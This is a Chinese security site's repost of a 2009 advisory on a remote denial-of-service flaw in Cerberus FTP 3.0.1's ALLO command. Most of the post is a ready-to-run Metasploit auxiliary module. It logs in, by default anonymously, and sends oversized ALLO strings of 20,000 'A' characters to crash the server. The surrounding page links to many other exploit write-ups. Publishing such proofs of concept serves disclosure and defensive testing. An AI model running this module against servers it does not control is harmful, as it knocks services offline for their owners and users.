首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cerberus FTP 3.0.1 (ALLO) Remote Overflow DoS Exploit (meta)
来源:Protek Research Lab's 作者:Francis 发布时间:2009-08-26  

#####################################################################################

Application:  Cerberus FTP 3.0.1
           
Platforms:    Windows XP Professional SP2

crash:       N/A
 
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
            

#####################################################################################

1) Introduction
2) Technical details
3) The Code


#####################################################################################

===============
1) Introduction

===============
Cerberus FTP Server is a secure and easy-to-use professional Windows FTP server featuring FIPS 140-2 certified encryption.

#####################################################################################

============================
2) Technical details
============================

The validation of some ftp commands are not made by the server. This lead to a a DoS....

 

#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

 include Msf::Exploit::Remote::Ftp
 include Msf::Auxiliary::Dos
 
 def initialize(info = {})
  super(update_info(info, 
   'Name'           => 'Cerberus FTP command ALLO overflow',
   'Description'    => %q{
     You need to have a valid login
    so you can run ALLO command.
   },
   'Author'         => 'Francis Provencher "Protek Research Lab's",
   'License'        => MSF_LICENSE,
   'Version'        => '1',
   'References'     =>
    
   'DisclosureDate' => 'Aug 24 2009'))

  # They're required
  register_options([
   OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
   OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
  ])
 end

 def run
  return unless connect_login

  print_status("Sending commands...")

  # We want to try to wait for responses to these
  raw_send("ALLO #{'A' * 20000}\r\n")
  raw_send("ALLO #{'A' * 20000}\r\n")

  disconnect
 end
end


#####################################################################################


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Xerox WorkCentre Multiple Mode
·Novell Client for Windows 2000
·Linux Kernel <= 2.6.31-rc7 AF_
·Lotus note connector for Black
·Media Jukebox 8 ( .M3U) Univer
·ProShow Producer / Gold 4.0.25
·ProFTP 2.9 (welcome message) R
·HyperVM File Permissions Local
·Adobe Reader version 8.0.0 den
·Mozilla Firefox 3.0.5 location
·PDFZilla version 1.0.8 Active-
·WM Downloader (.Smi/ .Ram/ .pl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved